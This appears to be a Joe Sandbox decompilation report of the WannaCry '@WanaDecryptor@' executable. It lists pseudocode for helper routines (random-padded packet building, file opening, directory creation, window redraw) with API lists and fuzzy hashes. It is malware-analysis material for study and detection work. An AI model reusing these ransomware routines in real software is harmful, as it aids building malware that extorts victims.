                                  				_t63 = __ecx;
                                  				_push(0);
                                  				L0041303E();
                                  				srand(__eax);
                                  				_t99 =  &_v508 + 8;
                                  				_t42 = rand();
                                  				asm("cdq");
                                  				_t94 = 0;
                                  				_t81 = _t42 % 0xc8 + 0x1f;
                                  				_v508 = _t81;
                                  				if(_t81 > 0) {
                                  					do {
                                  						_t62 = rand();
                                  						_t81 = _v508;
                                  						 *(_t99 + _t94 + 0x14) = _t62;
                                  						_t94 = _t94 + 1;
                                  					} while (_t94 < _t81);
                                  				}
                                  				_t95 = _a16;
                                  				_t97 = _t99 + _t81 - 0xb;
                                  				if(_t95 != 0) {
                                  					_push(_t89);
                                  					memcpy(_t97, E0040D5C0(_t95), 7 << 2);
                                  					_t99 = _t99 + 0xc;
                                  					asm("movsw");
                                  					asm("movsb");
                                  					_t81 = _v508;
                                  					_t95 = _a16;
                                  				}
                                  				 *((char*)(_t99 + _t81 + 0x14)) = _a4;
                                  				_t82 = _t81 + 1;
                                  				 *((char*)(_t99 + _t82 + 0x1c)) = _a8;
                                  				_t83 = _t82 + 1;
                                  				 *((char*)(_t99 + _t83 + 0x1c)) = _a12;
                                  				_v508 = _t83 + 1;
                                  				_t46 = E00412B00(_t97, 0x1f);
                                  				_t67 = _v508;
                                  				 *((short*)(_t99 + 8 + _t67 + 0x14)) = _t46;
                                  				_t48 =  *((intOrPtr*)( *_t63 + 0x18))(2,  &_v500, _t67 + 2, 0);
                                  				if(_t48 < 0) {
                                  					L12:
                                  					return _t48 | 0xffffffff;
                                  				} else {
                                  					E0040D5A0(_t63, _t97);
                                  					_push( &_v528);
                                  					_push( &_v520);
                                  					_push( &_v521);
                                  					_v528 = 0x1f4;
                                  					if( *((intOrPtr*)( *_t63 + 0x1c))() < 0 || _v529 != 2) {
                                  						_t48 =  *((intOrPtr*)( *_t63 + 0xc))();
                                  						goto L12;
                                  					} else {
                                  						if(_t95 == 0) {
                                  							L10:
                                  							return 0;
                                  						} else {
                                  							_push(1);
                                  							_push(_v536);
                                  							_push( &_v528);
                                  							_push(2);
                                  							if( *((intOrPtr*)( *_t95 + 0x18))() == 0) {
                                  								goto L10;
                                  							} else {
                                  								return  *((intOrPtr*)( *_t63 + 0xc))() | 0xffffffff;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}

























                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: rand$srandtime
                                  • String ID:
                                  • API String ID: 1946231456-0
                                  • Opcode ID: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                  • Instruction ID: 99a3411600cb7ade80f66248b35b99165d2bae15bbb14ca3cd699ef114e4807e
                                  • Opcode Fuzzy Hash: aeda45b4266ec6acd211240a262b9f529a391165e32c1a7dc214254ed02393b1
                                  • Instruction Fuzzy Hash: 6E411231A083454BD314DE69D885BABFBD4AFD4710F04893EE885973C2DA78D94987E3
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 97%
                                  			E004108A0(CHAR* _a4, intOrPtr _a8, char _a12, long* _a16) {
                                  				long _t28;
                                  				signed int _t38;
                                  				void* _t44;
                                  				long* _t45;
                                  				long _t46;
                                  				char _t47;
                                  
                                  				_t47 = _a12;
                                  				if(_t47 == 1 || _t47 == 2 || _t47 == 3) {
                                  					_t45 = _a16;
                                  					_t44 = 0;
                                  					_t38 = 0;
                                  					 *_t45 = 0;
                                  					_a12 = 0;
                                  					if(_t47 == 1) {
                                  						_t44 = _a4;
                                  						_a12 = 0;
                                  						goto L10;
                                  					} else {
                                  						if(_t47 != 2) {
                                  							L11:
                                  							_push(0x20);
                                  							L00412CEC();
                                  							_t46 = _t28;
                                  							if(_t47 == 1 || _t47 == 2) {
                                  								 *_t46 = 1;
                                  								 *((char*)(_t46 + 0x10)) = _a12;
                                  								 *(_t46 + 1) = _t38;
                                  								 *(_t46 + 4) = _t44;
                                  								 *((char*)(_t46 + 8)) = 0;
                                  								 *(_t46 + 0xc) = 0;
                                  								if(_t38 != 0) {
                                  									 *(_t46 + 0xc) = SetFilePointer(_t44, 0, 0, 1);
                                  								}
                                  								 *_a16 = 0;
                                  								return _t46;
                                  							} else {
                                  								 *((intOrPtr*)(_t46 + 0x14)) = _a4;
                                  								 *((intOrPtr*)(_t46 + 0x18)) = _a8;
                                  								 *_t46 = 0;
                                  								 *(_t46 + 1) = 1;
                                  								 *((char*)(_t46 + 0x10)) = 0;
                                  								 *((intOrPtr*)(_t46 + 0x1c)) = 0;
                                  								 *(_t46 + 0xc) = 0;
                                  								 *_a16 = 0;
                                  								return _t46;
                                  							}
                                  						} else {
                                  							_t44 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
                                  							if(_t44 != 0xffffffff) {
                                  								_a12 = 1;
                                  								L10:
                                  								_t28 = SetFilePointer(_t44, 0, 0, 1);
                                  								_t38 = _t38 & 0xffffff00 | _t28 != 0xffffffff;
                                  								goto L11;
                                  							} else {
                                  								 *_t45 = 0x200;
                                  								return 0;
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					 *_a16 = 0x10000;
                                  					return 0;
                                  				}
                                  			}










                                  APIs
                                  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 004108FB
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
                                  • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?), ref: 004109A2
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Pointer$#823Create
                                  • String ID:
                                  • API String ID: 3407337251-0
                                  • Opcode ID: 5b6d965423cb05d7ea7d52203198f533352c1688dc5c73679a86205e0e0c5deb
                                  • Instruction ID: 085c1855c78cd49c3d24b3d31d21a090ac304bae7dbf1d621fd5eca193cafac9
                                  • Opcode Fuzzy Hash: 5b6d965423cb05d7ea7d52203198f533352c1688dc5c73679a86205e0e0c5deb
                                  • Instruction Fuzzy Hash: BD31A3712943418FE331CF29E84179BBBE1AB85720F14891EE1D597781D3B6A4C8CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 92%
                                  			E00412250(CHAR* _a4, void* _a8) {
                                  				void _v260;
                                  				char _v520;
                                  				long _t16;
                                  				void* _t17;
                                  				void* _t29;
                                  				CHAR* _t32;
                                  				signed int _t33;
                                  				signed int _t34;
                                  				signed int _t36;
                                  				signed int _t39;
                                  				unsigned int _t46;
                                  				signed int _t47;
                                  				signed int _t51;
                                  				signed int _t52;
                                  				void* _t56;
                                  				void* _t83;
                                  				void* _t85;
                                  				void* _t86;
                                  				void* _t87;
                                  				char* _t88;
                                  				char* _t93;
                                  
                                  				_t88 =  &_v520;
                                  				_t32 = _a4;
                                  				if(_t32 != 0) {
                                  					_t16 = GetFileAttributesA(_t32);
                                  					if(_t16 == 0xffffffff) {
                                  						_t16 = CreateDirectoryA(_t32, 0);
                                  					}
                                  				}
                                  				_t87 = _a8;
                                  				_t34 =  *_t87;
                                  				if(_t34 == 0) {
                                  					L15:
                                  					return _t16;
                                  				} else {
                                  					_t17 = _t87;
                                  					_t56 = _t87;
                                  					do {
                                  						if(_t34 == 0x2f || _t34 == 0x5c) {
                                  							_t17 = _t56;
                                  						}
                                  						_t34 =  *(_t56 + 1);
                                  						_t56 = _t56 + 1;
                                  					} while (_t34 != 0);
                                  					if(_t17 != _t87) {
                                  						_t86 = _t87;
                                  						_t51 = _t17 - _t87;
                                  						_t52 = _t51 >> 2;
                                  						memcpy( &_v260, _t86, _t52 << 2);
                                  						_t29 = memcpy(_t86 + _t52 + _t52, _t86, _t51 & 0x00000003);
                                  						_t93 =  &(_t88[0x18]);
                                  						_t34 = 0;
                                  						_t93[_t29 + 0x114] = 0;
                                  						E00412250(_t32,  &_v260);
                                  						_t88 =  &(_t93[8]);
                                  					}
                                  					_v520 = 0;
                                  					if(_t32 != 0) {
                                  						asm("repne scasb");
                                  						_t46 =  !(_t34 | 0xffffffff);
                                  						_t85 = _t32 - _t46;
                                  						_t47 = _t46 >> 2;
                                  						memcpy(_t85 + _t47 + _t47, _t85, memcpy( &_v520, _t85, _t47 << 2) & 0x00000003);
                                  						_t88 =  &(_t88[0x18]);
                                  						_t34 = 0;
                                  					}
                                  					asm("repne scasb");
                                  					_t36 =  !(_t34 | 0xffffffff);
                                  					_t83 = _t87 - _t36;
                                  					_t33 = _t36;
                                  					asm("repne scasb");
                                  					_t39 = _t33 >> 2;
                                  					memcpy( &_v520 - 1, _t83, _t39 << 2);
                                  					memcpy(_t83 + _t39 + _t39, _t83, _t33 & 0x00000003);
                                  					_t16 = GetFileAttributesA( &_v520);
                                  					if(_t16 != 0xffffffff) {
                                  						goto L15;
                                  					} else {
                                  						return CreateDirectoryA( &_v520, 0);
                                  					}
                                  				}
                                  			}

























                                  APIs
                                  • GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00412338
                                  • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 0041234C
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesCreateDirectoryFile
                                  • String ID:
                                  • API String ID: 3401506121-0
                                  • Opcode ID: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                  • Instruction ID: eaae320e7248a4b774ebe1124a4f316430e5356865ecc18a96ed259e18cc5035
                                  • Opcode Fuzzy Hash: 5edde3796adf685aed60d110adb647f247c117a4bec97746d5288a2958dab9aa
                                  • Instruction Fuzzy Hash: 6F310331204B0847C72889389D957FFBBC6ABD4320F544B3EF966C72C1DEB989588299
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 80%
                                  			E00406A00(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12) {
                                  				void* _t15;
                                  				signed int _t23;
                                  				intOrPtr* _t33;
                                  				void* _t34;
                                  
                                  				_t23 = _a12;
                                  				_t33 = _a4;
                                  				_push(_t23);
                                  				_push(_a8);
                                  				_t34 = __ecx;
                                  				_push(_t33);
                                  				L00412D6A();
                                  				if(_t23 > 6) {
                                  					L12:
                                  					return _t15;
                                  				} else {
                                  					switch( *((intOrPtr*)(_t23 * 4 +  &M00406ABC))) {
                                  						case 0:
                                  							_push( *((intOrPtr*)(__ecx + 0x824)));
                                  							_t17 =  *((intOrPtr*)( *_t33 + 0x34))();
                                  							L00412D64();
                                  							if(_t17 == 0x402) {
                                  								L6:
                                  								_push(0xe0e0);
                                  								 *((intOrPtr*)( *_t33 + 0x38))();
                                  							} else {
                                  								L00412D64();
                                  								if(_t17 == 0x3fe) {
                                  									goto L6;
                                  								} else {
                                  									L00412D64();
                                  									if(_t17 == 0x3fb) {
                                  										goto L6;
                                  									} else {
                                  										_push(0xffffff);
                                  										 *((intOrPtr*)( *_t33 + 0x38))();
                                  									}
                                  								}
                                  							}
                                  							_t35 =  *((intOrPtr*)(_t34 + 0x828));
                                  							if(_t35 != 0) {
                                  								goto L11;
                                  							}
                                  							return 0;
                                  							goto L13;
                                  						case 1:
                                  							goto L12;
                                  						case 2:
                                  							_push( *((intOrPtr*)(__esi + 0x824)));
                                  							__ecx = __edi;
                                  							 *((intOrPtr*)( *__edi + 0x34))();
                                  							if(__esi != 0) {
                                  								L11:
                                  								return  *((intOrPtr*)(_t35 + 4));
                                  							}
                                  							return 0;
                                  							goto L13;
                                  					}
                                  				}
                                  				L13:
                                  			}








                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #3089$#4476
                                  • String ID:
                                  • API String ID: 2870283385-0
                                  • Opcode ID: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                  • Instruction ID: 793279239b1821bde48ff71d8c5d322d7df26b5d288dea54ba4f6719e02562de
                                  • Opcode Fuzzy Hash: 53d97fe879bd1ae3a70958cbaed72806608eb4448782c61a221ab90d014d582e
                                  • Instruction Fuzzy Hash: D91181323012018BC624EA59D584D7FB3A9EF89321B15842FE947E7391CB39ACA19B95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 91%
                                  			E0040D0A0(int __eax, intOrPtr* __ecx, char _a4, char _a8) {
                                  				char _v500;
                                  				signed int _t22;
                                  				signed int _t27;
                                  				intOrPtr* _t32;
                                  				void* _t40;
                                  				void* _t43;
                                  				void* _t44;
                                  				void* _t45;
                                  				void* _t46;
                                  				void* _t49;
                                  
                                  				_t32 = __ecx;
                                  				_push(0);
                                  				L0041303E();
                                  				srand(__eax);
                                  				_t49 =  &_v500 + 8;
                                  				_t22 = rand();
                                  				asm("cdq");
                                  				_t40 = 0;
                                  				_t43 = _t22 % 0xc8 + 0x1f;
                                  				if(_t43 <= 0) {
                                  					L2:
                                  					_t41 = _t49 + _t43 - 0x13;
                                  					 *((char*)(_t49 + _t43 + 0xc)) = _a4;
                                  					_t44 = _t43 + 1;
                                  					 *((char*)(_t49 + _t44 + 0x14)) = 0;
                                  					_t45 = _t44 + 1;
                                  					 *((char*)(_t49 + _t45 + 0x14)) = _a8;
                                  					_t46 = _t45 + 1;
                                  					 *((short*)(_t49 + 8 + _t46 + 0xc)) = E00412B00(_t49 + _t43 - 0x13, 0x1f);
                                  					_t27 =  *((intOrPtr*)( *_t32 + 0x18))(2,  &_v500, _t46 + 2, 0);
                                  					if(_t27 >= 0) {
                                  						E0040D5A0(_t32, _t41);
                                  						return 0;
                                  					} else {
                                  						return _t27 | 0xffffffff;
                                  					}
                                  				} else {
                                  					goto L1;
                                  				}
                                  				do {
                                  					L1:
                                  					 *((char*)(_t49 + _t40 + 0xc)) = rand();
                                  					_t40 = _t40 + 1;
                                  				} while (_t40 < _t43);
                                  				goto L2;
                                  			}














                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: rand$srandtime
                                  • String ID:
                                  • API String ID: 1946231456-0
                                  • Opcode ID: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                  • Instruction ID: 418ba94e1263f5c278544cd72932f8c5cb06cad23ebf9749a5f73f3a0ac0752c
                                  • Opcode Fuzzy Hash: bbdcb1e1a24d480e02c6f3989001f72fd3822a1270c55b374a5c1adf4e9cf230
                                  • Instruction Fuzzy Hash: CB113D3164935106D3207A2A6C02BAFAB949FE1728F04493FE9D9962C2C46C894E83F7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E00405180(void* __ecx, intOrPtr _a4) {
                                  				intOrPtr _t10;
                                  				intOrPtr _t19;
                                  				void* _t26;
                                  
                                  				_t19 = _a4;
                                  				_t26 = __ecx;
                                  				_t10 =  *((intOrPtr*)(__ecx + 0x44));
                                  				__imp___mbscmp(_t10, _t19);
                                  				if(_t10 == 0) {
                                  					return _t10;
                                  				} else {
                                  					_push(_t19);
                                  					L00412DA0();
                                  					 *((char*)(__ecx + 0x48)) = 1;
                                  					if( *((intOrPtr*)(__ecx + 0x74)) == 0) {
                                  						E00405800(__ecx, 0);
                                  					}
                                  					if( *((intOrPtr*)(_t26 + 0x70)) == 0) {
                                  						E00405820(_t26, 0);
                                  					}
                                  					if( *((intOrPtr*)(_t26 + 0x49)) == 0) {
                                  						return InvalidateRect( *(_t26 + 0x20), 0, 1);
                                  					}
                                  					return RedrawWindow( *(_t26 + 0x20), 0, 0, 0x121);
                                  				}
                                  			}







                                  APIs
                                  • _mbscmp.MSVCRT ref: 00405191
                                  • #860.MFC42(?), ref: 004051A1
                                  • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #860InvalidateRectRedrawWindow_mbscmp
                                  • String ID:
                                  • API String ID: 497622568-0
                                  • Opcode ID: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                  • Instruction ID: cf498a414c54833703d22adddad9dcc08bc55e2fe29af9a848031684a7c2f2b5
                                  • Opcode Fuzzy Hash: 4aae586b1cfc2d6b37c47d983e66569639a31ec6a673fed4d94bf49cd6230326
                                  • Instruction Fuzzy Hash: 7B01D871700B00A7D6209765DC59FDBB7E9EF98702F00442EF746EB2C0C675E4018B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E00412A00(intOrPtr* _a4) {
                                  				intOrPtr _t9;
                                  				intOrPtr _t10;
                                  				intOrPtr* _t14;
                                  				intOrPtr _t16;
                                  				void* _t18;
                                  
                                  				_t14 = _a4;
                                  				if(_t14 != 0) {
                                  					if( *_t14 == 1) {
                                  						_t2 = _t14 + 4; // 0x5d5e5f01
                                  						_t16 =  *_t2;
                                  						 *0x4220dc = E004127A0(_t16);
                                  						if(_t16 != 0) {
                                  							_t9 =  *((intOrPtr*)(_t16 + 0x138));
                                  							if(_t9 != 0) {
                                  								_push(_t9);
                                  								L00412C98();
                                  								_t18 = _t18 + 4;
                                  							}
                                  							_t10 =  *((intOrPtr*)(_t16 + 0x13c));
                                  							 *((intOrPtr*)(_t16 + 0x138)) = 0;
                                  							if(_t10 != 0) {
                                  								_push(_t10);
                                  								L00412C98();
                                  								_t18 = _t18 + 4;
                                  							}
                                  							_push(_t16);
                                  							 *((intOrPtr*)(_t16 + 0x13c)) = 0;
                                  							L00412C98();
                                  							_t18 = _t18 + 4;
                                  						}
                                  						_push(_t14);
                                  						L00412C98();
                                  						return  *0x4220dc;
                                  					} else {
                                  						 *0x4220dc = 0x80000;
                                  						return 0x80000;
                                  					}
                                  				} else {
                                  					 *0x4220dc = 0x10000;
                                  					return 0x10000;
                                  				}
                                  			}









                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8c2876bc683c79bd0f77c5504c849a1db55fe951b0604bd7b402bcddc95cd4ad
                                  • Instruction ID: 94773d8abf21b8992377dbaff6472308c4204eb390e4227f2b12783aedecbb61
                                  • Opcode Fuzzy Hash: 8c2876bc683c79bd0f77c5504c849a1db55fe951b0604bd7b402bcddc95cd4ad
                                  • Instruction Fuzzy Hash: 070121B16016109BDA209F29EA417CBB3989F40354F08443BE545D7310F7F8E9E5CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: closesocketsendsetsockoptshutdown
                                  • String ID:
                                  • API String ID: 4063721217-0
                                  • Opcode ID: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                  • Instruction ID: 511c5ca045328faec3d78f5435f76df0282562355462c5d2c83a81ecee0c9610
                                  • Opcode Fuzzy Hash: b8ea9e4fb017428832e7fdcfab5aceec40e53c9ca13a03ff53aa9a0524c23656
                                  • Instruction Fuzzy Hash: 9D014075200B40ABD3208B28C849B97B7A5AF89721F808B2CF6A9962D0D7B4A4088795
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E00404430(intOrPtr __ecx, char _a8) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				char _v16;
                                  				intOrPtr _t13;
                                  				struct HICON__* _t16;
                                  				struct HICON__* _t17;
                                  				intOrPtr _t26;
                                  
                                  				_t26 = __ecx;
                                  				_t13 =  *((intOrPtr*)(__ecx + 0x59));
                                  				if(_t13 != 0) {
                                  					if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
                                  						E00404530(__ecx);
                                  					}
                                  					if(E004045E0(_t26,  &_a8) == 0) {
                                  						_t16 =  *(_t26 + 0x60);
                                  					} else {
                                  						_t16 =  *(_t26 + 0x5c);
                                  					}
                                  					_t17 = SetCursor(_t16);
                                  					L00412CBC();
                                  					return _t17;
                                  				} else {
                                  					_v16 = 0x10;
                                  					if(__ecx != 0) {
                                  						_t13 =  *((intOrPtr*)(__ecx + 0x20));
                                  						_v8 = _t13;
                                  					} else {
                                  						_v8 = __ecx;
                                  					}
                                  					_v12 = 2;
                                  					__imp___TrackMouseEvent( &_v16);
                                  					 *((char*)(_t26 + 0x59)) = 1;
                                  					L00412CBC();
                                  					return _t13;
                                  				}
                                  			}











                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379$CursorEventMouseTrack
                                  • String ID:
                                  • API String ID: 2186836335-0
                                  • Opcode ID: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                  • Instruction ID: d4ee5e4a134dc88e0fb0520758ee2c50d42c0b6297011b3ab606eb820e3435c7
                                  • Opcode Fuzzy Hash: 8cae4badaefa13b91853eadf55a8840a780c3bb417d72a3b214d508dff938200
                                  • Instruction Fuzzy Hash: 1501B5B46047209BC714EF1895047EFBBD46FC4718F40881EEAC557382E6B898058B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00404CF0(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _t13;
                                  				intOrPtr* _t21;
                                  				intOrPtr* _t22;
                                  				intOrPtr _t27;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041384E);
                                  				_t13 =  *[fs:0x0];
                                  				_push(_t13);
                                  				 *[fs:0x0] = _t27;
                                  				_v20 = __ecx;
                                  				_v4 = 0;
                                  				_t21 = __ecx + 0x70;
                                  				_v16 = _t21;
                                  				 *_t21 = 0x415c00;
                                  				_v4 = 3;
                                  				L00412D52();
                                  				 *_t21 = 0x415bec;
                                  				_t22 = __ecx + 0x64;
                                  				_v16 = _t22;
                                  				 *_t22 = 0x415c00;
                                  				_v4 = 4;
                                  				L00412D52();
                                  				 *_t22 = 0x415bec;
                                  				_v4 = 0;
                                  				L00412CC2();
                                  				_v4 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v12;
                                  				return _t13;
                                  			}












                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
                                  • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
                                  • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
                                  • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
